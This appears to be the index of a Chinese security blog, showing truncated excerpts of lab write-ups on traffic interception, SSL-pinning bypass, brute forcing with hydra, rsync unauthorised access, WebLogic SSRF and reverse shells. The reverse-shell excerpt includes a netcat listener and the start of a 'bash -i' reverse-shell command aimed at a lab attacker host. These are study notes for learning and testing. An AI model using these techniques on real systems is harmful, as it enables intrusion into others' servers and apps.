iptables防火墙配置
关于iptables的过滤表的常见命令规则 1、iptables规则表1234567891011121314151617iptables默认实现数据包过滤的表是fiter(-t 指定规则表,未指定时默认为filter),包含三条链。(1)Filter(针对过滤系统):INPUT、FORWARD、OUTPUT INPUT:处理流入本地的数据包 FORWARD:处理通过系统路由的数据包 OUTPUT:处理本地流出的数据包(2)NAT(针对地址转换系统):PREROUTING、POSTROUTING、INPUT、OUTPUT PREROUTING:处理即将接收的数据包 POSTROUTING:处理即将传出的数据包(3)Mangle(针对策略路由只和特殊应用):OUTPUT、POSTROUTING 2、选项12345678910111213-A 在链的末尾追加一条规则-I 在链的开头插入一条规则-D 删除链内指定序号(或内容)的一条规则-P 为指定的链设置默认规则-L 列出所有的规则条目-F 清空所有规则-R...
burp拦截手机app数据包
有时候呢,有些app在模拟器打不开,只能使用本机,所以需要拦截到本机的app数据。 1、开启电脑的burp代理监听使用ipconfig命令查看本机的WLAN地址,这里地址为192.168.0.248 然后在burp的proxy—option中,添加代理。地址为前面的WLAN地址,端口设置为任意未被占用端口,这里设置为8888。 2、安装burp证书到本机完成第二步之后,直接浏览器访问ip:端口,然后下载证书。 下载完成之后,将证书的der后缀改为cer,然后发给手机安装。 我是用微信传输助手直接发送,手机接收到之后,直接可以选择用证书安装器安装该证书,提示安装成功即可。 3、配置手机WLAN代理在保证手机跟电脑连接同一个网络之后,选择修改该网络,代理选择手动,服务器主机名为ip,服务器端口为前面设置的端口号,然后保存即可。 4、burp拦截到手机app数据包上述步骤都完成之后,此时的burp已经可以拦截到手机的app数据包了。
proxifier代理拦截数据包
若有的客户端不支持直接设置代理,则可通过proxifier来拦截其数据包。 1、设置burp代理设置burp代理,这里为127.0.0.1:8080 2、在proxifier中添加代理服务器打开proxifier——配置文件——代理服务器,设置与步骤1相同地址端口的代理。 设置好之后,可点击检查验证一下是否正常。 3、在proxifier中添加代理规则这里根据实际情况添加目标应用程序名称(我发现在任务管理器里面找名称更准确哈)。 3.1拦截客户端PC(exe文件)数据包打开任务管理器,运行客户端程序,找到应用,打开文件所在位置,即可找到文件名称,例如Foxmail客户端名称为Foxmail.exe: 然后在proxifier——配置文件——代理规则,点击添加代理规则。规则名称任意取名,应用程序为Foxmail.exe,动作选择步骤2添加的代理服务器。 打开应用程序,即可拦截到数据包: 3.2拦截微信小程序数据包步骤跟3.1一样的,这里可以看到应用程序名称为WeChatAppEx.exe:
在Ubuntu上安装Docker Desktop
docker是个好容器,本文说明它在Ubuntu系统上的安装运行。 一、官方文档要求安装的系统条件 https://docs.docker.com/desktop/install/ubuntu/ 1、操作系统要求: Ubuntu Mantic 23.10Ubuntu Lunar 23.04Ubuntu Jammy 22.04 (LTS)Ubuntu Focal 20.04 (LTS) 使用命令查看操作系统版本信息: 1lsb_release -a 2、KVM虚拟化支持检查 该步骤呢,就是最后在启动docker desktop时,能够正常打开应用程序,如果没有开启KVM虚拟化,最后启动应用程序时也会提示系统没有KVM,无法运行。 2.1检查服务器CPU是否启用了KVM内核模板1运行命令:kvm-ok 未启用则开启 再验证,已经成功支持: 2.2提供对KVM设备的访问如果主机具有虚拟化支持,则模块应自动加载。要手动加载模块,运行命令: 1modprobe kvm 根据主机的处理器,必须加载相应的模块: 123modprobe...
关于微信小程序的解密与反编译工具
对于微信小程序包的解密与反编译 1、定位小程序缓存路径 Applet目录下以wx开头的文件(微信小程序id)就代表小程序: 可根据对应的修改日期确定进入的是哪个小程序,或者直接全部删除缓存,重新进入小程序,新生成的即为所找寻的对应小程序。我们进入文件夹里面,其实里面就是一个文件,这就是我们小程序的源码,但是是加密的,我们需要对其解密。 2、使用工具解密源码 解密与反编译工具:https://github.com/superBiuBiuMan/wechatMiniAppReverse 进入工具目录的1.first文件夹,运行命令: 12pc_wxapkg_decrypt.exe -wxid 微信小程序id -in 要解密的wxapkg路径 -out...
验证已知漏洞的jquery库插件
扫描网站使用的jquery库,是否为具有已知漏洞的版本。 1、前言1.1 简介 在 jquery 的诸多发行版本中,存在着 DOM型XSS 漏洞,易被攻击者利用。 1.2 漏洞成因 漏洞原因在于过滤用户输入数据所使用的正则表达式存在缺陷,可能导致 LOCATION.HASH 跨站漏洞。 2、扫描插件——retire.js 这里强烈推荐我觉得很好用的一个插件:retire.js。我一般是作为火狐的插件使用,这样在浏览网页时会自动检测到jquery的版本信息。 会显示jquery的版本以及对应的jquery的网址,以及可能存在哪些CVE的漏洞。 3、验收jquery历史漏洞版本环境版本漏洞检测网站:http://research.insecurelabs.org/jquery/test/ jQuery 版本漏洞验证网站:https://jsbin.com/?html,js,output 3.1...
关于hydra的Windows使用
23年快结束了,发现好像今年还没有发过博客,忙忙碌碌,一年也快过去啦,以后还是要把我的博客捡起来咯 前言 对于页面登录框的暴力破解,一般使用BurpSuite就够了。但是对于数据库以及其他协议的密码破解,hydra无疑是个很棒的工具。 目前支持以下协议破解: AFP,Cisco AAA,Cisco身份验证,Cisco启用,CVS,Firebird,FTP,HTTP-FORM-GET,HTTP-FORM-POST,HTTP-GET,HTTP-HEAD,HTTP-PROXY,HTTPS-FORM- GET,HTTPS-FORM-POST,HTTPS-GET,HTTPS-HEAD,HTTP-Proxy,ICQ,IMAP,IRC,LDAP,MS-SQL,MYSQL,NCP,NNTP,Oracle Listener,Oracle SID,Oracle,PC-Anywhere, PCNFS,POP3,POSTGRES,RDP,Rexec,Rlogin,Rsh,SAP /...
记一次惨痛教训
事情的起因是这样的,前两天晚上,我可能是突发奇想,决定把我电脑的中文用户名改成拼音的,那样在cmd里面加载出来也好看一点。所以我就直接百度,按照教程直接在注册表里面把名字改了。这一改问题就大了。。。 改完之后,重启我的电脑出现的是这个界面: 当时我就不敢动了,然后我又开始找原因,找了各种办法,看网上有人说他们可行,但我真的反正没成功。 先说一下,我最后成功地经验吧。 上面那种情况,电脑是自动登录在一个临时账户里面的,你原来的账户还在。这个时候,千万千万不要乱修改,不然就会像我一样,之前的数据彻底没了。如果你直接在这个临时账户里面修改任何东西,等到重启之后它是不会保存的,所以就没有用。 这个时候应该先创建一个具有管理员权限的账户: 123net user username password /add //这里的username自己任意取名,password也是自己设置的密码net localgroup administrators username /add //这里的username为上一步创建的用户名 新用户创建好之后,还可以输入net...
rsync未授权访问漏洞利用
关于rsync服务未授权漏洞的几种利用方式~~ 00x0 前言环境: Ubuntu:192.168.25.129(靶机) kali:192.168.25.128(攻击机) 在Ubuntu上启动rsync的docker环境: 进入环境:cd vulhub/rsync/common 自动编译环境:sudo docker-compose build 启动整个环境:sudo docker-compose up -d 最后实验完成时删除整个环境:sudo docker-compose down -v 00x1 漏洞介绍 rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。 00x2 常用命令(1)查看服务器目录123rsync ip:: (rsync默认端口873)rsync --port=xxx ip::...
反弹shell与计划任务
关于在kali和Ubuntu测试反弹shell和利用计划任务进行反弹shell~~ 00x0 前言 不知道为什么我之前练习的靶场中关于反弹shell,都是不成功,找了很多原因,很头疼。觉得还是要从根源找原因,然后认真的记录了一下关于反弹shell和利用计划任务进行反弹shell的原理。用centos作为靶机环境没那么麻烦,但我用的Ubuntu,问就是不想再下个centos的镜像了呜呜呜。 00x1反弹shell 对于正向连接和反弹shell,我浅显地理解为: 正向连接:先在靶机上监听端口,或者靶机上开放了某个特殊端口,然后在攻击机上进行连接利用。 反向连接:先在攻击机上监听端口,然后在靶机上发送请求命令到攻击机,使靶机的命令行反弹到攻击机中。 kali:192.168.25.128 Ubuntu:192.168.25.129 1、bash反弹 kali作为攻击机,Ubuntu作为靶机 (1) 先在kali上监听端口 1nc -lvnp 9999 (2)在Ubuntu上输入反弹shell命令 1bash -i >&...
frida+objection绕过SSL Pinning
绕过单向认证又多了一种尝试方式呢 环境:夜神模拟器 Android7 32位 burpsuite 前提: 已经在模拟器上配置了网络,并下载了证书。 在burp上面设置了同样地址和端口的代理: 配置代理+安装burp证书,只能满足于一部分的app截获数据包。但是对于大部分app而言,要通过其他方式绕过。 这里采用frida+objection绕过app的ssl证书校验。当app采用单向认证时,可以使用此种方式尝试绕过。即客户端对服务器的证书进行了校验,而burp不能充当中间人的角色,拦截不到数据包,这里要做的就是在客户端关闭这个认证。 (1)单项认证-客户端校验服务端的证书。 (2)双向认证-客户端和服务器双向认证。不仅客户端要校验服务端的证书,也会在 app 内放一张证书,服务端会校验客户端里的证书。 1、下载frida-server12345下载地址:https://github.com/frida/frida/releasesfrida-server-16.0.2-android-x86...
weblogic SSRF漏洞
关于weblogic的ssrf漏洞验证~~ 00x1漏洞描述 weblogic中存在SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 00x2 影响版本 weblogic 10.0.2-10.3.6版本 00x3 漏洞复现 这里使用的是vulfocus[https://vulfocus.cn/#/dashboard]的weblogic靶场。 启动靶场,是404的环境,我刚开始还以为是环境没加载出来,原来可以直接访问uddiexplorer应用。 1访问:http://ip:端口/uddiexplorer/,无需登录即可查看uddiexplorer应用。 漏洞存在于search public...